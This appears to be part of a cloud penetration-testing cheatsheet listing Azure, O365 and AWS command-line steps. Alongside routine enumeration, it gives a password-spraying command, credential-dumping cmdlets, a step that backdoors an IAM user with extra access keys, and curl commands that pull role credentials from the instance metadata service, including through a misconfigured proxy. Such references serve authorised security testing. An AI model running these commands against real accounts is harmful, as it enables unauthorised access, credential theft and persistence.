Cloud Pen-testing Part -3
## Microsoft Azure & O365 CLI Tool Cheatsheet (Part-3)
### Other Azure & O365 Tools
#### Look for open storage blobs
```powershell
Invoke-EnumerateAzureBlobs -Base $BaseName
Export SSL/TLS certs
Get-AzPasswords -ExportCerts Y
Azure Container Registry dump
Get-AzPasswords
Get-AzACR
PowerZure
Azure security assessment tool
https://github.com/hausec/PowerZure
ROADTools
Framework to interact with Azure AD
https://github.com/dirkjanm/ROADtools
Stormspotter
Red team tool for graphing Azure and Azure AD objects
https://github.com/Azure/Stormspotter
MSOLSpray
Tool to password spray Azure/O365
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020
Amazon Web Services (AWS) CLI Tool Cheatsheet
Authentication
# Set AWS programmatic keys for authentication (use --profile= for a new profile)
aws configure
Open S3 bucket enumeration
List the contents of an S3 bucket
aws s3 ls s3://<bucketname>/
Download contents of a bucket
aws s3 sync s3://bucketname s3-files-dir
Account Information
Get basic account info
aws sts get-caller-identity
List IAM users
aws iam list-users
List IAM roles
aws iam list-roles
List S3 buckets accessible to an account
aws s3 ls
Virtual Machines
List EC2 instances
aws ec2 describe-instances
WebApps & SQL
List WebApps
aws deploy list-applications
### List AWS RDS (SQL)
```shell
aws rds describe-db-instances --region <region name>
Serverless
List Lambda Functions
aws lambda list-functions --region <region>
Look at environment variables set for secrets and analyze code
aws lambda get-function --function-name <lambda function>
Networking
List EC2 subnets
aws ec2 describe-subnets
List EC2 network interfaces
aws ec2 describe-network-interfaces
List DirectConnect (VPN) connections
aws directconnect describe-connections
Backdoors
List access keys for a user
aws iam list-access-keys --user-name <username>
Backdoor account with a second set of access keys
aws iam create-access-key --user-name <username>
Instance Metadata Service URL
http://169.254.169.254/latest/meta-data
Additional IAM credentials possibly available here
http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM Role Name>
Can potentially hit it externally if a proxy service (like Nginx) is being hosted in AWS and misconfigured
curl --proxy vulndomain.target.com:80 http://169.254.169.254/latest/metadata/iam/security-credentials/ && echo
IMDS Version 2 has some protections, but these commands can be used to access it
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"